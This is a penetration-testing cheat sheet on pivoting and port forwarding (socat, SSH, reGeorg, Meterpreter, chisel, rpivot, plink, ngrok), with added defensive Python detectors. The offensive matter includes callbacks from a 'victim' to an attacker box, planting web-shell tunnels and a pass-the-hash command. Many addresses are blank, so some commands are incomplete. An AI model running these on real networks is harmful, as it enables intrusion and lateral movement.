Pivoting & Port forwarding methods – part2


This post focuses on port forwarding. These are the tools and methods covered:

  • socat
  • windows Netsh
  • SSH
  • proxychains
  • Web Socks
  • Metasploit
  • sshuttle
  • chisel
  • Rpivot
  • Plink
  • Ngrok


Socat

To install socat, we simply run:

sudo apt-get update
sudo apt-get install socat

To run socat and forward traffic from port 808 on your internet-facing node to port 443 on the remote node, run the following command:

socat TCP4-LISTEN:808,fork TCP4:

To forward traffic from port 9090 on your internet-facing node to port 22 on the remote node, and at the same time forward port 81 to port 21 on ftp.microsft.com, run the following two commands:

socat TCP4-LISTEN:9090,fork TCP4:
socat TCP4-LISTEN:81,fork TCP4:ftp.microsft.com:21

Windows Netsh Port Forwarding

netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport

netsh interface portproxy add v4tov4 listenport=3340 listenaddress= connectport=3389 connectaddress=
  1. listenaddress – the local IP address that waits for a connection.
  2. listenport – the local TCP port that listens for the connection.
  3. connectaddress – the local or remote IP address (or DNS name) to which the incoming connection is redirected.
  4. connectport – the TCP port to which the connection arriving on listenport is forwarded.
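A portproxy rule is also how a pivot survives on a Windows host, so the listing above is something an incident responder checks. The following is an added example, not code from the original post: a Python parser for the output of `netsh interface portproxy show all` that rates each rule. The sample output is constructed to approximate the table netsh prints; the port-to-service map and the severity rules are assumptions of this example.

```python
"""Parse `netsh interface portproxy show all` output and flag forwarding rules.

Added example, not code from the original post. The sample output is
constructed to approximate the table netsh prints; on a real host, run the
command and pass its output to parse_portproxy().
"""
import re

# Constructed sample (not captured from a real host).
SAMPLE_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
*               3340        10.0.0.5        3389
0.0.0.0         445         10.0.0.7        445
127.0.0.1       8080        127.0.0.1       9090
"""

# Destination ports where a portproxy rule usually means a pivot, not admin work
# (assumed list for this example; extend it for your environment).
SENSITIVE_PORTS = {
    22: "ssh", 88: "kerberos", 389: "ldap", 445: "smb",
    3389: "rdp", 5985: "winrm", 5986: "winrm-tls",
}

# One rule row: listen address, listen port, connect address, connect port.
ROW = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+(\d+)$")


def parse_portproxy(text):
    """Return one dict per v4tov4 rule found in the netsh table."""
    rules = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue  # headers, separator lines, blank lines
        rules.append({
            "listen_addr": m.group(1), "listen_port": int(m.group(2)),
            "connect_addr": m.group(3), "connect_port": int(m.group(4)),
        })
    return rules


def is_loopback(addr):
    return addr in ("127.0.0.1", "localhost", "::1")


def assess(rules):
    """Rate each rule: high when at least two of the three indicators apply."""
    findings = []
    for r in rules:
        reasons = []
        if not is_loopback(r["listen_addr"]):
            reasons.append("listener reachable from the network")
        if not is_loopback(r["connect_addr"]):
            reasons.append("forwards to another host")
        if r["connect_port"] in SENSITIVE_PORTS:
            reasons.append(f"destination is {SENSITIVE_PORTS[r['connect_port']]}")
        severity = "high" if len(reasons) >= 2 else "medium" if reasons else "info"
        findings.append((severity, r, reasons))
    return findings


if __name__ == "__main__":
    # The same rules persist under
    # HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp, so compare the
    # registry with this listing when the netsh output looks suspiciously empty.
    for severity, r, reasons in assess(parse_portproxy(SAMPLE_OUTPUT)):
        print(f"[{severity}] {r['listen_addr']}:{r['listen_port']} -> "
              f"{r['connect_addr']}:{r['connect_port']} {'; '.join(reasons)}")
```

Run on the constructed sample, the two rules that listen on all interfaces and hand RDP and SMB to other hosts come out as high, while the loopback-to-loopback rule is reported as info only.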



SSH Dynamic Port Forwarding

ssh -D8080 [user]@[host]

ssh -N -f -D 9000 [user]@[host]
-f : ssh in background
-N : do not execute a remote command

Cool Tip: Konami-style SSH port forwarding. You can add a forward to an SSH session that is already open: press [ENTER] and then ~C to reach the ssh> command line, and type the forwarding option there, for example:

-D 1090

Local Port Forwarding

ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]

Remote Port Forwarding

ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
ssh -R 3389: root@
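The server side decides whether any of the -L, -D and -R forwards above work at all. As an added example, not code from the original post, here is a small Python audit of an sshd_config that reports which forwarding features a server leaves enabled, either explicitly or through OpenSSH's documented defaults (AllowTcpForwarding defaults to yes; GatewayPorts, PermitTunnel and X11Forwarding default to no). The two configurations are constructed samples: one left permissive, one hardened.

```python
"""Audit an sshd_config for directives that enable SSH port forwarding.

Added example, not from the original post. Parses the directives governing
-L/-D/-R forwarding and reports which are enabled, explicitly or by default.
"""

# Constructed sample: forwarding left at permissive values or defaults.
PERMISSIVE_CONFIG = """\
Port 22
PermitRootLogin yes
GatewayPorts yes
PermitTunnel yes
"""

# Constructed sample: the same server with forwarding switched off.
HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
AllowTcpForwarding no
GatewayPorts no
PermitTunnel no
X11Forwarding no
"""

# Values sshd uses when a directive is absent (sshd_config(5)).
# AllowTcpForwarding defaults to yes, so omitting it is the same as enabling it.
DEFAULTS = {
    "allowtcpforwarding": "yes",
    "gatewayports": "no",
    "permittunnel": "no",
    "x11forwarding": "no",
}

# What each directive lets an authenticated client do.
WHY = {
    "allowtcpforwarding": "ssh -L / -D / -R TCP forwards (plink and proxychains over -D rely on this)",
    "gatewayports": "-R listeners bound to non-loopback addresses on the server",
    "permittunnel": "tun/tap tunnels (ssh -w)",
    "x11forwarding": "X11 channel forwarding",
}


def parse_sshd_config(text):
    """Return {keyword_lower: first_value} for the global section.

    sshd uses the first occurrence of a keyword. Directives after a Match
    block apply only conditionally, so parsing stops there.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.replace("=", " ").split(None, 1)  # "Key value" or "Key = value"
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            break
        settings.setdefault(key, value)
    return settings


def effective_value(settings, key):
    return settings.get(key, DEFAULTS[key]).lower()


def forwarding_findings(text):
    """List the forwarding features that are effectively enabled."""
    settings = parse_sshd_config(text)
    findings = []
    for key in DEFAULTS:
        value = effective_value(settings, key)
        # AllowTcpForwarding also accepts "local", "remote" and "all";
        # anything other than "no" leaves some forwarding on.
        if value != "no":
            source = "explicit" if key in settings else "default"
            findings.append(f"{key}={value} ({source}): enables {WHY[key]}")
    return findings


if __name__ == "__main__":
    for name, cfg in (("permissive", PERMISSIVE_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"== {name} ==")
        for finding in forwarding_findings(cfg) or ["no forwarding enabled"]:
            print(" ", finding)
```

Two caveats worth keeping in mind when reading the output: AllowTcpForwarding no stops the -L, -D and -R forms shown above, but accounts that need a subset of forwards are better served by PermitOpen, which limits the destinations a client may ask for; and sshuttle (covered later in this post) does not use TCP forwarding channels at all, it runs a helper over the session's standard input and output, so only a restricted shell or ForceCommand prevents it.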


Proxychains

Config file: /etc/proxychains.conf

socks4 localhost 8080

Set the SOCKS4 proxy in the config file, then prefix the tool you want to tunnel, for example: proxychains nmap -sT

Web SOCKS – reGeorg

reGeorg, the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.

Drop one of the following files on the server:

  • tunnel.ashx
  • tunnel.aspx
  • tunnel.js
  • tunnel.jsp
  • tunnel.nosocket.php
  • tunnel.php
  • tunnel.tomcat.5.jsp

python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp # the socks proxy will be on port 8080

optional arguments:
  -h, --help           show this help message and exit
  -l , --listen-on     The default listening address
  -p , --listen-port   The default listening port
  -r , --read-buff     Local read buffer, max data to be sent per POST
  -u , --url           The url containing the tunnel script
  -v , --verbose       Verbose output[INFO|DEBUG]


Metasploit

# Meterpreter list active port forwards
portfwd list 

# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd add -l 3389 -p 3389 -r target-host 
portfwd add -l 88 -p 88 -r
portfwd add -L -l 445 -r -p 445

# Removes the forward of 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd delete -l 3389 -p 3389 -r target-host 
# Meterpreter delete all port forwards
portfwd flush 


# Use Meterpreter's autoroute script to add the route for the specified subnet
run autoroute -s 
use auxiliary/server/socks4a

# Meterpreter list all active routes
run autoroute -p 

# Meterpreter view available networks the compromised host can access
route
# Meterpreter add a route for the given subnet via session number 3
route add 3 
# Meterpreter delete the route for the given subnet via session number 3
route delete 3 
# Meterpreter delete all routes
route flush 


sshuttle

The transparent proxy server that works as a poor man’s VPN. Forwards over ssh.

  • Doesn’t require admin.
  • Works with Linux and macOS.
  • Supports DNS tunnelling.

pacman -Sy sshuttle
apt-get install sshuttle
sshuttle -vvr sean@
sshuttle -vvr username@pivot_host 


Chisel

go get -v github.com/jpillora/chisel

# forward port 389 and 88 to hacker computer
user@victim$ .\chisel.exe client YOUR_IP:8008 R:88: R:389:localhost:389 
user@hacker$ /opt/chisel/chisel server -p 8008 --reverse


Rpivot

Server (Attacker box)

python server.py --proxy-port 1080 --server-port 9443 --server-ip

Client (Compromised box)

python client.py --server-ip <ip> --server-port 9443

Through corporate proxy

python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e

Passing the hash

python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe \
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE


Plink

# exposes the SMB port of the machine in the port 445 of the SSH Server
plink -l root -pw toor -R 445: 
# exposes the RDP port of the machine in the port 3390 of the SSH Server
plink -l root -pw toor ssh-server-ip -R 3390:  

plink -l root -pw mypassword -R
plink.exe -v -pw mypassword user@ -L 6666:

plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
# redirects the Windows port 445 to Kali on port 22
plink -P 22 -l root -pw some_password -C -R 445:   


Ngrok

# get the binary
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip 

# log into the service
./ngrok authtoken 3U[REDACTED_TOKEN]Hm

# deploy a port forwarding for 4433
./ngrok http 4433
./ngrok tcp 4433


For my time in the labs, I started out using single-hop local SSH forwards through a pivot point that I had owned in the remote network. This works just fine if you know that port 80 is open and all you want to do is connect to port 80 inside a network you don’t have direct access to. That looks something like:

ssh root@ -L 81:

Later on, I learned to do more dynamic SSH forwards with proxychains:


I used a dynamic ssh tunnel via John:
ssh -f -N -D j0hn@ -p 22000
Tested with:
proxychains nmap -sT -Pn

ssh -f -N -D sean@
leafpad /etc/proxychains.conf
proxychains ssh -f -N -D root@ -p 222
leafpad /etc/proxychains.conf
proxychains ssh luigi@

And even later, I did double pivoting using proxychains:

ssh -tt -L8080:localhost:8157 sean@ ssh -t -D 8157 mario@ -p 222
set up proxychains to use our forwarded port 8080:
leafpad /etc/proxychains.conf
strict_chain or dynamic_chain
socks4 8080

Basic Pivoting Types

Type               Use Case
Listen – Listen    Exposed asset, may not want to connect out.
Listen – Connect   Normal redirect.
Connect – Connect  Can’t bind, so connect to bridge two hosts.

Listen – Listen

Tool           Command
ncat           ncat -v -l -p 8080 -c "ncat -v -l -p 9090"
socat          socat -v tcp-listen:8080 tcp-listen:9090
remote host 1  ncat localhost 8080 < file
remote host 2  ncat localhost 9090 > newfile

Listen – Connect

Tool           Command
ncat           ncat -l -v -p 8080 -c "ncat localhost 9090"
socat          socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090
remote host 1  ncat localhost -p 8080 < file
remote host 2  ncat -l -p 9090 > newfile

Connect – Connect

Tool           Command
ncat           ncat localhost 8080 -c "ncat localhost 9090"
socat          socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090
remote host 1  ncat -l -p 8080 < file
remote host 2  ncat -l -p 9090 > newfile
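Every relay in the tables above, and most of the tools earlier in this post (socat, chisel, plink, ngrok, an ssh client holding a -D or -L listener), shows up on the pivot host as a listening socket owned by a process that normally has no business listening. As an added example, not code from the original post, the following Python script parses `ss -tlnp` style output and flags those listeners. The sample output is constructed in the shape ss prints, and the list of relay tool names is an assumption of this example, taken from the tools this post covers.

```python
"""Flag listening sockets owned by relay/tunnel tools in `ss -tlnp` output.

Added example, not from the original post. Feed it the real output of
`ss -tlnp` (run as root so process names are populated).
"""
import re

# Constructed sample in the layout of `ss -tlnp`; not captured from a real host.
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       4096    127.0.0.1:8080       0.0.0.0:*          users:(("socat",pid=2231,fd=5))
LISTEN  0       10      0.0.0.0:9090         0.0.0.0:*          users:(("ncat",pid=2240,fd=4))
LISTEN  0       4096    *:8008               *:*                users:(("chisel",pid=2310,fd=7))
LISTEN  0       128     127.0.0.1:1090       0.0.0.0:*          users:(("ssh",pid=2355,fd=6))
LISTEN  0       511     0.0.0.0:80           0.0.0.0:*          users:(("nginx",pid=1200,fd=6))
"""

# Process names of the relay and tunnel tools discussed in this post
# (assumed list; ssh is handled separately because the *client* only listens
# when a -L or -D forward is active, whereas sshd listening is normal).
RELAY_TOOLS = {"socat", "ncat", "nc", "chisel", "plink", "ngrok", "sshuttle"}

# One LISTEN row: local addr:port, peer, then users:(("name",pid=N,fd=M)).
LINE = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)


def parse_listeners(text):
    """Return one dict per LISTEN row that names its owning process."""
    listeners = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:  # the header row and rows without process info do not match
            listeners.append({
                "addr": m["addr"], "port": int(m["port"]),
                "proc": m["proc"], "pid": int(m["pid"]),
            })
    return listeners


def suspicious_listeners(text):
    """Pair each suspicious listener with the reason it was flagged."""
    hits = []
    for l in parse_listeners(text):
        if l["proc"] in RELAY_TOOLS:
            hits.append((l, f"{l['proc']} is a relay/tunnel tool"))
        elif l["proc"] == "ssh":
            hits.append((l, "ssh client holds a listener: a -L or -D forward is active"))
    return hits


if __name__ == "__main__":
    for l, reason in suspicious_listeners(SAMPLE_SS):
        print(f"pid {l['pid']:>6} {l['proc']:<8} {l['addr']}:{l['port']:<5} {reason}")
```

On the constructed sample the sshd and nginx listeners pass, while the socat and ncat relays, the chisel server and the ssh client's 1090 listener are reported. A listener bound to 127.0.0.1 is still worth a look: the Listen – Connect and Connect – Connect patterns above deliberately use loopback on the pivot host.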

